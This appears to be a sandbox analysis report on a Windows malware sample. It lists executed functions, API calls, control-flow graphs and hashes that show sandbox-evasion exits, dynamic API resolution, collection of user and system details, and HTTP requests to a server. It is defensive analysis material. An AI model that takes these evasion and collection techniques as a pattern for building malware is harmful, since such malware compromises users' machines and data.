27214 45733d lstrcpy lstrcat 27213->27214 27214->27212 27217 45728c 27215->27217 27216 4572b4 27216->27062 27217->27216 27218 4572ac lstrcpy 27217->27218 27218->27216 27221 4572dc 27219->27221 27220 4351b7 27220->27065 27221->27220 27222 4572ed lstrcpy lstrcat 27221->27222 27222->27220 27252 4531f0 GetSystemInfo wsprintfA 27229 438c79 malloc 27266 431b64 162 API calls 27278 43bbf9 90 API calls 27258 44f2f8 93 API calls 27236 44e0f9 140 API calls 27267 446b79 138 API calls 27237 452880 10 API calls 27238 454480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27239 453480 6 API calls 27259 453280 7 API calls 27268 43b309 98 API calls 27240 448c88 16 API calls 27249 454e35 7 API calls 27269 459711 14 API calls __setmbcp 27231 452c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27279 43db99 673 API calls 27242 45749e memset malloc ctype 27243 442499 290 API calls 27280 448615 47 API calls 27244 4530a0 GetSystemPowerStatus 27253 4529a0 GetCurrentProcess IsWow64Process 27271 444b29 304 API calls 27281 4423a9 298 API calls 27250 453130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27282 44abb2 120 API calls 27257 43f639 144 API calls 27260 4316b9 200 API calls 27273 43bf39 177 API calls

                            Executed Functions

                            Function 00434C50 Relevance: 111.1, APIs: 61, Strings: 2, Instructions: 807stringnetworkCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00434C7F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434CD2
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434D05
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434D35
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434D73
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00434DA6
                            • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00434DB6
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$InternetOpen
                            • String ID: "$------
                            • API String ID: 2041821634-2370822465
                            • Opcode ID: a9cca48351dd44cbd60a230368d95ca791f47a0fccc6b6132061471ee642aa53
                            • Instruction ID: 08a09a62b5bcb9963eab1400ba28ac24fe42f412a17923790aca84b1731f440d
                            • Opcode Fuzzy Hash: a9cca48351dd44cbd60a230368d95ca791f47a0fccc6b6132061471ee642aa53
                            • Instruction Fuzzy Hash: C2529071A002169FCB21EFB5DC45B9FB7B9AF48314F15602AF805A7251DB78EC41CBA8
                            Function 00456390 Relevance: 58.0, APIs: 32, Strings: 1, Instructions: 218libraryloaderCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2125 456390-4563bd GetPEB 2126 4565c3-456623 LoadLibraryA * 5 2125->2126 2127 4563c3-4565be call 4562f0 GetProcAddress * 20 2125->2127 2128 456625-456633 GetProcAddress 2126->2128 2129 456638-45663f 2126->2129 2127->2126 2128->2129 2132 456641-456667 GetProcAddress * 2 2129->2132 2133 45666c-456673 2129->2133 2132->2133 2134 456675-456683 GetProcAddress 2133->2134 2135 456688-45668f 2133->2135 2134->2135 2137 4566a4-4566ab 2135->2137 2138 456691-45669f GetProcAddress 2135->2138 2139 4566d7-4566da 2137->2139 2140 4566ad-4566d2 GetProcAddress * 2 2137->2140 2138->2137 2140->2139
                            APIs
                            • GetProcAddress.KERNEL32(76210000,00FF1570), ref: 004563E9
                            • GetProcAddress.KERNEL32(76210000,00FF1708), ref: 00456402
                            • GetProcAddress.KERNEL32(76210000,00FF1720), ref: 0045641A
                            • GetProcAddress.KERNEL32(76210000,00FF14F8), ref: 00456432
                            • GetProcAddress.KERNEL32(76210000,00FF93A0), ref: 0045644B
                            • GetProcAddress.KERNEL32(76210000,00FE62D8), ref: 00456463
                            • GetProcAddress.KERNEL32(76210000,00FE6358), ref: 0045647B
                            • GetProcAddress.KERNEL32(76210000,00FF1768), ref: 00456494
                            • GetProcAddress.KERNEL32(76210000,00FF16C0), ref: 004564AC
                            • GetProcAddress.KERNEL32(76210000,00FF1558), ref: 004564C4
                            • GetProcAddress.KERNEL32(76210000,00FF16D8), ref: 004564DD
                            • GetProcAddress.KERNEL32(76210000,00FE63D8), ref: 004564F5
                            • GetProcAddress.KERNEL32(76210000,00FF1738), ref: 0045650D
                            • GetProcAddress.KERNEL32(76210000,00FF1750), ref: 00456526
                            • GetProcAddress.KERNEL32(76210000,00FE6458), ref: 0045653E
                            • GetProcAddress.KERNEL32(76210000,00FF1780), ref: 00456556
                            • GetProcAddress.KERNEL32(76210000,00FF1798), ref: 0045656F
                            • GetProcAddress.KERNEL32(76210000,00FE6198), ref: 00456587
                            • GetProcAddress.KERNEL32(76210000,00FF18A0), ref: 0045659F
                            • GetProcAddress.KERNEL32(76210000,00FE62F8), ref: 004565B8
                            • LoadLibraryA.KERNEL32(00FF1888,?,?,?,00451C03), ref: 004565C9
                            • LoadLibraryA.KERNEL32(00FF1810,?,?,?,00451C03), ref: 004565DB
                            • LoadLibraryA.KERNEL32(00FF1828,?,?,?,00451C03), ref: 004565ED
                            • LoadLibraryA.KERNEL32(00FF1840,?,?,?,00451C03), ref: 004565FE
                            • LoadLibraryA.KERNEL32(00FF1858,?,?,?,00451C03), ref: 00456610
                            • GetProcAddress.KERNEL32(75B30000,00FF1870), ref: 0045662D
                            • GetProcAddress.KERNEL32(751E0000,00FF18B8), ref: 00456649
                            • GetProcAddress.KERNEL32(751E0000,00FF17F8), ref: 00456661
                            • GetProcAddress.KERNEL32(76910000,00FF9708), ref: 0045667D
                            • GetProcAddress.KERNEL32(75670000,00FE6318), ref: 00456699
                            • GetProcAddress.KERNEL32(77310000,00FF9310), ref: 004566B5
                            • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 004566CC
                            Strings
                            • NtQueryInformationProcess, xrefs: 004566C1
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$LibraryLoad
                            • String ID: NtQueryInformationProcess
                            • API String ID: 2238633743-2781105232
                            • Opcode ID: 9094ac6d500926738430b8e1cc0ed2c03d796947df22dee9bb744fbc2c1fd837
                            • Instruction ID: 2be699da6649eccfd68941b8a8b360b4905830b98d09ee35ab6895ed5ffa7e18
                            • Opcode Fuzzy Hash: 9094ac6d500926738430b8e1cc0ed2c03d796947df22dee9bb744fbc2c1fd837
                            • Instruction Fuzzy Hash: 5AA15DB5A19240AFD754DFB8ED58A2637BFF789745300A61EED1683360DBB4A800DB70
                            Function 00451BF0 Relevance: 45.2, APIs: 30, Instructions: 220stringCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2141 451bf0-451c0b call 432a90 call 456390 2146 451c0d 2141->2146 2147 451c1a-451c27 call 432930 2141->2147 2148 451c10-451c18 2146->2148 2151 451c35-451c63 2147->2151 2152 451c29-451c2f lstrcpy 2147->2152 2148->2147 2148->2148 2156 451c65-451c67 ExitProcess 2151->2156 2157 451c6d-451c7b GetSystemInfo 2151->2157 2152->2151 2158 451c85-451ca0 call 431030 call 4310c0 GetUserDefaultLangID 2157->2158 2159 451c7d-451c7f ExitProcess 2157->2159 2164 451ca2-451ca9 2158->2164 2165 451cb8-451cca call 452ad0 call 453e10 2158->2165 2164->2165 2166 451cb0-451cb2 ExitProcess 2164->2166 2171 451ce7-451d06 lstrlen call 432930 2165->2171 2172 451ccc-451cde call 452a40 call 453e10 2165->2172 2177 451d23-451d40 lstrlen call 432930 2171->2177 2178 451d08-451d0d 2171->2178 2172->2171 2185 451ce0-451ce1 ExitProcess 2172->2185 2186 451d42-451d44 2177->2186 2187 451d5a-451d7b call 452ad0 lstrlen call 432930 2177->2187 2178->2177 2180 451d0f-451d11 2178->2180 2180->2177 2183 451d13-451d1d lstrcpy lstrcat 2180->2183 2183->2177 2186->2187 2188 451d46-451d54 lstrcpy lstrcat 2186->2188 2193 451d7d-451d7f 2187->2193 2194 451d9a-451db4 lstrlen call 432930 2187->2194 2188->2187 2193->2194 2196 451d81-451d85 2193->2196 2199 451db6-451db8 2194->2199 2200 451dce-451deb call 452a40 lstrlen call 432930 2194->2200 2196->2194 2198 451d87-451d94 lstrcpy lstrcat 2196->2198 2198->2194 2199->2200 2201 451dba-451dc8 lstrcpy lstrcat 2199->2201 2206 451ded-451def 2200->2206 2207 451e0a-451e0f 2200->2207 2201->2200 2206->2207 2208 451df1-451df5 2206->2208 2209 451e16-451e22 call 432930 2207->2209 2210 451e11 call 432a20 2207->2210 2208->2207 2212 451df7-451e04 lstrcpy lstrcat 2208->2212 2215 451e24-451e26 2209->2215 2216 451e30-451e66 call 432a20 * 5 OpenEventA 2209->2216 2210->2209 2212->2207 2215->2216 2217 451e28-451e2a lstrcpy 2215->2217 2228 451e8c-451ea0 CreateEventA call 451b20 call 44ffd0 2216->2228 2229 451e68-451e8a CloseHandle Sleep OpenEventA 2216->2229 2217->2216 2233 451ea5-451eae CloseHandle ExitProcess 2228->2233 2229->2228 2229->2229
                            APIs
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1570), ref: 004563E9
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1708), ref: 00456402
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1720), ref: 0045641A
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF14F8), ref: 00456432
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF93A0), ref: 0045644B
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FE62D8), ref: 00456463
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FE6358), ref: 0045647B
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1768), ref: 00456494
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF16C0), ref: 004564AC
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1558), ref: 004564C4
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF16D8), ref: 004564DD
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FE63D8), ref: 004564F5
                              • Part of subcall function 00456390: GetProcAddress.KERNEL32(76210000,00FF1738), ref: 0045650D
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00451C2F
                            • ExitProcess.KERNEL32 ref: 00451C67
                            • GetSystemInfo.KERNEL32(?), ref: 00451C71
                            • ExitProcess.KERNEL32 ref: 00451C7F
                              • Part of subcall function 00431030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00431046
                              • Part of subcall function 00431030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0043104D
                              • Part of subcall function 00431030: ExitProcess.KERNEL32 ref: 00431058
                              • Part of subcall function 004310C0: GlobalMemoryStatusEx.KERNEL32 ref: 004310EA
                              • Part of subcall function 004310C0: ExitProcess.KERNEL32 ref: 00431114
                            • GetUserDefaultLangID.KERNEL32 ref: 00451C8F
                            • ExitProcess.KERNEL32 ref: 00451CB2
                            • ExitProcess.KERNEL32 ref: 00451CE1
                            • lstrlen.KERNEL32(00FF9410), ref: 00451CEE
                            • lstrcpy.KERNEL32(00000000,?), ref: 00451D15
                            • lstrcat.KERNEL32(00000000,00FF9410), ref: 00451D1D
                            • lstrlen.KERNEL32(00464B98), ref: 00451D28
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D48
                            • lstrcat.KERNEL32(00000000,00464B98), ref: 00451D54
                            • lstrlen.KERNEL32(00000000), ref: 00451D63
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451D89
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451D94
                            • lstrlen.KERNEL32(00464B98), ref: 00451D9F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DBC
                            • lstrcat.KERNEL32(00000000,00464B98), ref: 00451DC8
                            • lstrlen.KERNEL32(00000000), ref: 00451DD7
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00451DF9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00451E04
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                            • String ID:
                            • API String ID: 3366406952-0
                            • Opcode ID: e62d341eacd92ff7d7f7804f71cfd226d25f06517812ee88417fc899336574c0
                            • Instruction ID: 344788c40b08b461a8b22847c65d26ac83b229b0d7bf9e32be3f02134fbe7ae8
                            • Opcode Fuzzy Hash: e62d341eacd92ff7d7f7804f71cfd226d25f06517812ee88417fc899336574c0
                            • Instruction Fuzzy Hash: 5C71D731500305AFDB21ABB1DD49B6F777EAF45746F04202AFD0697262DBB89C09C768
                            Function 00436C40 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 229networkstringfileCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2234 436c40-436c64 call 432930 2237 436c66-436c6b 2234->2237 2238 436c75-436c97 call 434bc0 2234->2238 2237->2238 2239 436c6d-436c6f lstrcpy 2237->2239 2242 436caa-436cba call 432930 2238->2242 2243 436c99 2238->2243 2239->2238 2247 436cc8-436cf5 InternetOpenA StrCmpCA 2242->2247 2248 436cbc-436cc2 lstrcpy 2242->2248 2244 436ca0-436ca8 2243->2244 2244->2242 2244->2244 2249 436cf7 2247->2249 2250 436cfa-436cfc 2247->2250 2248->2247 2249->2250 2251 436d02-436d22 InternetConnectA 2250->2251 2252 436ea8-436ebb call 432930 2250->2252 2253 436ea1-436ea2 InternetCloseHandle 2251->2253 2254 436d28-436d5d HttpOpenRequestA 2251->2254 2261 436ec9-436ee0 call 432a20 * 2 2252->2261 2262 436ebd-436ebf 2252->2262 2253->2252 2256 436d63-436d65 2254->2256 2257 436e94-436e9e InternetCloseHandle 2254->2257 2259 436d67-436d77 InternetSetOptionA 2256->2259 2260 436d7d-436dad HttpSendRequestA HttpQueryInfoA 2256->2260 2257->2253 2259->2260 2263 436dd4-436de4 call 453d90 2260->2263 2264 436daf-436dd3 call 4571e0 call 432a20 * 2 2260->2264 2262->2261 2265 436ec1-436ec3 lstrcpy 2262->2265 2263->2264 2273 436de6-436de8 2263->2273 2265->2261 2276 436dee-436e07 InternetReadFile 2273->2276 2277 436e8d-436e8e InternetCloseHandle 2273->2277 2276->2277 2279 436e0d 2276->2279 2277->2257 2281 436e10-436e15 2279->2281 2281->2277 2283 436e17-436e3d call 457310 2281->2283 2286 436e44-436e51 call 432930 2283->2286 2287 436e3f call 432a20 2283->2287 2291 436e53-436e57 2286->2291 2292 436e61-436e8b call 432a20 InternetReadFile 2286->2292 2287->2286 2291->2292 2293 436e59-436e5b lstrcpy 2291->2293 2292->2277 2292->2281 2293->2292
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 00436C6F
                            • lstrcpy.KERNEL32(00000000,0045CFEC), ref: 00436CC2
                            • InternetOpenA.WININET(0045CFEC,00000001,00000000,00000000,00000000), ref: 00436CD5
                            • StrCmpCA.SHLWAPI(?,00FFF918), ref: 00436CED
                            • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00436D15
                            • HttpOpenRequestA.WININET(00000000,GET,?,00FFF490,00000000,00000000,-00400100,00000000), ref: 00436D50
                            • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00436D77
                            • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00436D86
                            • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00436DA5
                            • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00436DFF
                            • lstrcpy.KERNEL32(00000000,?), ref: 00436E5B
                            • InternetReadFile.WININET(?,00000000,000007CF,?), ref: 00436E7D
                            • InternetCloseHandle.WININET(00000000), ref: 00436E8E
                            • InternetCloseHandle.WININET(?), ref: 00436E98
                            • InternetCloseHandle.WININET(00000000), ref: 00436EA2
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00436EC3
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$lstrcpy$CloseHandleHttp$FileOpenReadRequest$ConnectInfoOptionQuerySend
                            • String ID: ERROR$GET
                            • API String ID: 3687753495-3591763792
                            • Opcode ID: 1c65595b0163d62eeee96e698209719f6d3422af7a0712a357cfc7b4b554c69b
                            • Instruction ID: 1c60e1ed612c4f25c8f9ba7cc00af0018b9a61d6a557402d769de72e40cdaa31
                            • Opcode Fuzzy Hash: 1c65595b0163d62eeee96e698209719f6d3422af7a0712a357cfc7b4b554c69b
                            • Instruction Fuzzy Hash: 6F819271A00316AFDB20DFA5DC45BAF77B9AF48700F115159F905E7281DBB4AD048BA8
                            Function 00434A60 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119memoryCOMMON
                            Download Yara Rule

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 2850 434a60-434afc RtlAllocateHeap 2867 434b7a-434bbe VirtualProtect 2850->2867 2868 434afe-434b03 2850->2868 2869 434b06-434b78 2868->2869 2869->2867
                            APIs
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00434AA2
                            • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00434BB0
                            Strings
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251597570.0000000000935000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251772001.0000000000AD9000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251790334.0000000000ADA000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_1_2_430000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: AllocateHeapProtectVirtual
                            • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                            • API String ID: 1542196881-3329630956
                            • Opcode ID: 001eac2873da47131b71ead6def0882d47bbb00102271b044bff24a9a94df192
                            • Instruction ID: 6ca8904d3e8d76327d58b75ed15f36c64530825f198f7c2b441f2b6ce6292186
                            • Opcode Fuzzy Hash: 001eac2873da47131b71ead6def0882d47bbb00102271b044bff24a9a94df192
                            • Instruction Fuzzy Hash: DA31F2A8BC032C769E28EBFF4C47F5F6E55DFC5B60B224053740857180E9A95609CAEB
                            Function 00452A40 Relevance: 4.5, APIs: 3, Instructions: 33memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 00452A6F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00452A76
                            • GetUserNameA.ADVAPI32(00000000,00000104), ref: 00452A8A
                            Memory Dump Source
                            • Source File: 00000001.00000002.2250850983.0000000000431000.00000040.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                            • Associated: 00000001.00000002.2250830171.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000467000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004BE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.00000000004DF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2250850983.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251169468.000000000067A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000067C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000081B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.00000000008F0000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.000000000091B000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000925000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000001.00000002.2251188031.0000000000934000.00000040.00000001.01000000.00000003.sdmpDownload File
